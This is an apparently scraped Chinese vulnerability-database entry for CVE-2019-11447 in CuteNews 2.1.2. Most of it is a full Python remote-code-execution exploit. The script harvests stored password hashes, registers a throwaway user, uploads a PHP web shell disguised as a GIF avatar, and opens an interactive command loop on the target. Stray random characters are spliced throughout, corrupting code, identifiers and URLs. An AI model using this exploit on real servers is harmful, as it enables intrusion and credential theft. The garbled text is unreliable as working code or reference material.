CutePHP CuteNews 安全漏洞

漏洞ID 1579869 漏洞类型 代码问题
发布时间 2020-09-13 更新时间 2020-09-13
CVE编号 CVE-2019-11447

CNNVD-ID CNNVp f ! @ [ ! } C !D-201904-1015
漏洞平台 N/A CVSS评分 N/A
漏洞来源
https://cxsecurity.com/issuV o / 0 ) f , H de/l F ,WLB-2020090060
htP n Itp://www.cnnvd.l s dorg.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201904-1015
漏洞详情
CutePHP CuteNews是一套新闻管理系统。该系统具有搜索、文件上传管理、访? ) . 问控制、备份和恢复等功能。
CutePHP CuteNews 2.1.2版本中存在安全漏洞。攻击者可借助‘avatar_file’字 N l f 0段利用该漏洞执行代码。
漏洞EXP
# Exploit TiT + U | 8tle: CuteNews 2.1.2 - Remote Code Exn M 5 4ecuti9 % H _ f w fon
# Google Dork: N/A
# Date: 2020-09-10
# ExpR c ? , 9 Y 6loit Author: Musyoka Ian
# Vendor Homepage: h+ a b m zttps://cute( @ { / ^ h ~ ophp.com/cutenews/downloading.php
# Software Link: https://cutephp.com/cutenews/downloading.php
# Version? / e -: CuteNews 2.o H m I  T1.2
# Tested) C @ ~ # Z on: UbuntD - v M B c * S 0u 20.04, CuteNews 2.1.2
# CVE : CVE-2019-11447
#! /bin/ec V & O ` g ;nd t {v python3
import requests
from basec O A a U64 import b64decode
import io
import re
import string
import random
import sys
banner = """
_____     __      _  __                     ___   ___  ___
/ ___/_ __/ /___M 3 U ) _ / / /__ _    _____       _   <  / _  
/ /__/ // / __/ -_)    / -_) // (_-<      / __/_ / / / __/
\r q T H x @ & o_f 4 @ _ 9 p__/\_,_/# A x ? } g_k d 8 u Q_/\__/_/_/\__/__,__/___/     /____(_)_(_)____C E x q =/
___s W B } 4 4 q G L  _________
/ _ \/ ___/ __O A , f 7 . a/
/ , _/ /__/ _/
/_? # 3 z 8 2 R T/_\___/___/
"b  } a U ( , /""
print (banner)
print ("[->] Usage python3 expoit.py")
p. 2 H )rint ()
sess = requests.session()
payload = "GIF8;\n<?php system($_REQUEST['cmd']r P / L i) ?>"
ip = input("Enter the URL> ")
def extract_credentials():
global sess, ip
url = f"{ip}/9 l y t [ ;CuteNews/cdata/users/lines"
enc? ) l Goded_creds = sess.get(url).t4 L  E @ * V ext
buff = io.String+ U B z $ @ y j fIO(encoded_creds)
chash = buff.readlines()
if "Not Found" in encoded_creds:
print ("[-] No hashes were found skipping!!!")
return
else:
for line in chash:
if "<?php die('Direct call - access d@ { :enied'); ?>" nF L T { ~ _ m lot in li~  2 N l !ne:
credentig X g Z A T @als = b64decodek ( 7(line)
try:
sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1)
print (sha_hashM L + | k X ? n %)
except:
pass
def register():
global sess, ip
userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) fA  . P T t s I vor _ in range(10))
postdata = {
"act4 m ] L |ion" : "register",
"regusername" : userpass,
"reg o fnickname J { ` o" :~ . L B userpass,
"regpassword" : userpass,
"confirm" : uA Z k k - # , $serpass,
"regemail" : f"{userpass}@hack.me"
}
register = s9 ` L C q x O _ess.post(f"{ip}/Cute3 Z % 2 ! g { * $News/index.php?register", data = postde C 5 xata, allow_redil 0 q 5 _ 5 ~ crects = False)
if 302 == register.status_code:
print (f"[+] Registration successful with username: {userpass} and password: {userpasp X 0 $s}")
else:
sys.exit()
def send_payload(payload):
global ip
token = sess.get(f"{ip}/CuteNews/index.php?mod=main&opt=personal").text
signature_key = re.P - Z | E c ` isearch('signature_key" value="(.*?)"', token).group(1)
signature_dsi = ri w $e.search('sigU o U unature_dsi" vk S a +alue="(.*?)"N W r d g ( m Z X', token).gb = o Zroup(1)
logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1)
print (f"signature_key: {signature_key}")
print (f"signature_dsi: {signature_dsi}")
print (f"logged in user: {logged_user}")
files: + + Z 8 C | = {
"mod" : (None, "main"),
"opt" : (NonW ] , 7e, "personal"),
"__signature_key" : (None, f"{s) f Z l s = ; tignature_key}"),
"__signature_dx h b K u p -  ]si" : (None, f"{signature_dsi}"),
"editpassword" : (/ ] , JNone, ""),
"confirmpassword" : (None, ""),
"editnickname| t + e ; U _ (" : (None, log/ x &ged_user),
"avatar_file" : ({ m K R Q 2 ] mf"{loggG & {ed_user}.php", pa~ ( cyl{ { Boad),
"more[site]" : (None, "I * M 6 i & $"),
"more[about]" : (None, "")
}
payload_send = sess.post(f"{ip}/CuteNews/index.php", files = filg t ( ^  Yes).text
print(2 I e t g y = 0 x"============================\nDropping to a SHELL\n============================")
while True:
print ()
command} D X . N , 8 D w = input("command > ")
postdata = {"cmdI m | g" : command}
output = sess.post(4 : ! R a , C ,f"{ip}/CuteNy y 7 N 7 # n c oews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdal 0 Gta)
if 404 == output.status_code:
print ("sorry i can't find your webshell try r} o Y x T n w B Punning the exploit again")
sys.i C } } [ Lexit()
else:
output = re.sub("GIF8;", "", output.te* u A s oxt)
print (output.strip())
if __name__ ==] @ a * 6 H 8 3 "__main__":
print ("& U a : d =================================================================\nUsers& 7 P G SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JN N JOHN\n================================================4 M i !================")
extract_credentials()
print ("============7 % _ Q====================================================")
print()
print ("=============================\nRegistering a users\n=============================")
register()
print()
print("=============================8 O } T Q 6 Y 3 Z==========================\nSending Payload\n=======================================================")
send_payload(payload)
print ()
参考资料

来源:www.exploit-db.com

链接:https://www.exploit-db.com/exploits/46698/

来源:pentest.com.tr

链接:http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-& Y Q - M t aMetasploit.html

来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/de) R / j htail/CVE-2019-11447